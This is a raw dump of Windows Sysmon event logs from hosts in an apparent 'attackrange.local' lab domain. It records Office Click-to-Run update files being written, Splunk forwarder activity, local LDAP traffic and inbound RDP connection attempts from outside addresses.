14:54:19.659{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Filters\api-ms-win-crt-heap-l1-1-0.dll2021-04-20 14:54:19.659 11241100x800000000000000064763Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:19.659{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Filters\api-ms-win-core-timezone-l1-1-0.dll2021-04-20 14:54:19.659 11241100x800000000000000064762Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:19.659{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Filters\api-ms-win-core-xstate-l2-1-0.dll2021-04-20 14:54:19.659 11241100x800000000000000064761Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:19.659{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Filters\api-ms-win-crt-conio-l1-1-0.dll2021-04-20 14:54:19.659 11241100x800000000000000064760Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:19.659{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Filters\api-ms-win-crt-convert-l1-1-0.dll2021-04-20 14:54:19.659 11241100x800000000000000064759Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:19.659{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Filters\api-ms-win-crt-environment-l1-1-0.dll2021-04-20 14:54:19.659 11241100x800000000000000064758Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:19.659{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Filters\api-ms-win-crt-filesystem-l1-1-0.dll2021-04-20 14:54:19.659 11241100x800000000000000064757Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:19.659{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Filters\api-ms-win-core-processthreads-l1-1-1.dll2021-04-20 14:54:19.659 11241100x800000000000000064756Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:19.659{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Filters\api-ms-win-crt-locale-l1-1-0.dll2021-04-20 14:54:19.659 11241100x800000000000000064755Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:19.659{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Filters\api-ms-win-crt-math-l1-1-0.dll2021-04-20 14:54:19.659 11241100x800000000000000064754Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:19.659{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Filters\api-ms-win-crt-multibyte-l1-1-0.dll2021-04-20 14:54:19.487 23542300x800000000000000064753Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:19.549{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2DA2C4663C90D481CDEFB29FDEA74093,SHA256=6A40928BBAF393A5AF67C44AD87F68C8FA0873138AF32159B8C2BAF785E06FD6,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000064752Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:19.487{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Filters\api-ms-win-crt-private-l1-1-0.dll2021-04-20 14:54:19.487 11241100x800000000000000064751Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:19.487{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Filters\api-ms-win-crt-process-l1-1-0.dll2021-04-20 14:54:19.487 11241100x800000000000000064750Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:19.487{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Filters\api-ms-win-crt-runtime-l1-1-0.dll2021-04-20 14:54:19.487 11241100x800000000000000064749Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:19.487{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Filters\api-ms-win-crt-stdio-l1-1-0.dll2021-04-20 14:54:19.487 11241100x800000000000000064748Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:19.487{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Filters\api-ms-win-crt-string-l1-1-0.dll2021-04-20 14:54:19.487 11241100x800000000000000064747Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:19.487{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Filters\api-ms-win-crt-time-l1-1-0.dll2021-04-20 14:54:19.487 11241100x800000000000000064746Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:19.487{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Filters\api-ms-win-crt-utility-l1-1-0.dll2021-04-20 14:54:19.487 11241100x800000000000000064745Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:19.487{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Filters\concrt140.dll2021-04-20 14:54:19.487 11241100x800000000000000064744Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:19.487{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Filters\mfc140u.dll2021-04-20 14:54:19.487 354300x800000000000000064743Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:17.917{A7A01FEF-B624-607E-0B00-00000000BB01}860C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:1082:b69b:30c5:c700win-dc-339.attackrange.local57487-truefe80:0:0:0:1082:b69b:30c5:c700win-dc-339.attackrange.local389ldap 354300x800000000000000064742Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:17.916{A7A01FEF-B636-607E-2E00-00000000BB01}2196C:\Windows\System32\dfsrs.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:1082:b69b:30c5:c700win-dc-339.attackrange.local57487-truefe80:0:0:0:1082:b69b:30c5:c700win-dc-339.attackrange.local389ldap 11241100x800000000000000064741Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:19.284{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\VBA\VBA7.1\VBEUI.DLL2021-04-20 14:54:19.284 11241100x800000000000000064740Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:19.268{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\System\msvcr100.dll2021-04-20 14:54:19.268 11241100x800000000000000064739Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:19.268{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\OUTLLIBR.DLL2021-04-20 14:54:19.268 11241100x800000000000000064738Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:19.268{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\OUTLWVW.DLL2021-04-20 14:54:19.268 11241100x800000000000000064737Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:19.268{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\SOCIALCONNECTORRES.DLL2021-04-20 14:54:19.268 23542300x800000000000000064736Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:19.112{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1ED7CA08C64841CD80882E6ACC409479,SHA256=892963D14A186D2E84D9F60F1C84F27B8C7D17AE63FC202CCC224447CBEEED60,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000064735Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localEXE2021-04-20 14:54:18.987{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Windows\Installer\{90160000-000F-0000-1000-0000000FF1CE}\lyncicon.exe2021-04-20 14:54:18.987 11241100x800000000000000064734Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:18.987{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\oregres.dll2021-04-20 14:54:18.987 11241100x800000000000000064733Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:18.987{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\api-ms-win-core-xstate-l2-1-0.dll2021-04-20 14:54:18.987 23542300x800000000000000049492Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:19.823{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C826FFFBCC68E92E8BC6403C0FC4C040,SHA256=4DB673AC2C595107073F832B44A5941B60DC3152F81BA143A49F8EE67D884929,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000049491Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:19.541{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=45A5D022DB3E0B3874330A8D5CAC6A5F,SHA256=37247A7FAE865F3D07AC18B1E04844D87CA0C664F3EDAC552B987031DDA85B14,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000049490Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:17.146{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-60571-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 354300x800000000000000049489Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:17.087{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.234scanner.openportstats.com60508-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 11241100x800000000000000064819Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:20.940{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Filters\api-ms-win-crt-multibyte-l1-1-0.dll2021-04-20 14:54:20.940 11241100x800000000000000064818Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:20.940{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Filters\api-ms-win-crt-math-l1-1-0.dll2021-04-20 14:54:20.940 11241100x800000000000000064817Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:20.940{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Filters\api-ms-win-crt-locale-l1-1-0.dll2021-04-20 14:54:20.940 11241100x800000000000000064816Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:20.940{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Filters\api-ms-win-crt-time-l1-1-0.dll2021-04-20 14:54:20.940 11241100x800000000000000064815Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:20.940{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Filters\api-ms-win-crt-heap-l1-1-0.dll2021-04-20 14:54:20.940 11241100x800000000000000064814Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:20.940{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Filters\api-ms-win-crt-filesystem-l1-1-0.dll2021-04-20 14:54:20.940 11241100x800000000000000064813Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:20.940{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Filters\api-ms-win-crt-convert-l1-1-0.dll2021-04-20 14:54:20.877 11241100x800000000000000064812Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:20.877{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Filters\api-ms-win-core-timezone-l1-1-0.dll2021-04-20 14:54:20.877 11241100x800000000000000064811Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:20.877{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Filters\api-ms-win-crt-conio-l1-1-0.dll2021-04-20 14:54:20.877 11241100x800000000000000064810Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:20.877{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Filters\api-ms-win-core-xstate-l2-1-0.dll2021-04-20 14:54:20.877 11241100x800000000000000064809Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:20.877{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Filters\api-ms-win-crt-environment-l1-1-0.dll2021-04-20 14:54:20.877 11241100x800000000000000064808Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:20.877{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Filters\api-ms-win-core-file-l2-1-0.dll2021-04-20 14:54:20.877 11241100x800000000000000064807Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:20.877{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Filters\api-ms-win-core-synch-l1-2-0.dll2021-04-20 14:54:20.877 11241100x800000000000000064806Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:20.877{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Filters\api-ms-win-core-processthreads-l1-1-1.dll2021-04-20 14:54:20.877 11241100x800000000000000064805Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:20.877{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\OWSSUPP.DLL2021-04-20 14:54:20.877 11241100x800000000000000064804Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:20.877{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\OSFPROXY.DLL2021-04-20 14:54:20.877 11241100x800000000000000064803Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:20.877{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\MSOSB.DLL2021-04-20 14:54:20.877 11241100x800000000000000064802Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:20.877{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Filters\api-ms-win-core-file-l1-2-0.dll2021-04-20 14:54:20.877 11241100x800000000000000064801Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:20.877{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\NPSPWRAP.DLL2021-04-20 14:54:20.877 11241100x800000000000000064800Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:20.877{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Filters\api-ms-win-core-localization-l1-2-0.dll2021-04-20 14:54:20.877 11241100x800000000000000064799Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:20.815{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE16\1033\MSOINTL.DLL2021-04-20 14:54:20.815 11241100x800000000000000064798Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:20.815{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\1033\STSUCRES.DLL2021-04-20 14:54:20.815 11241100x800000000000000064797Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:20.581{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\OUTLCTL.DLL2021-04-20 14:54:20.581 11241100x800000000000000064796Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 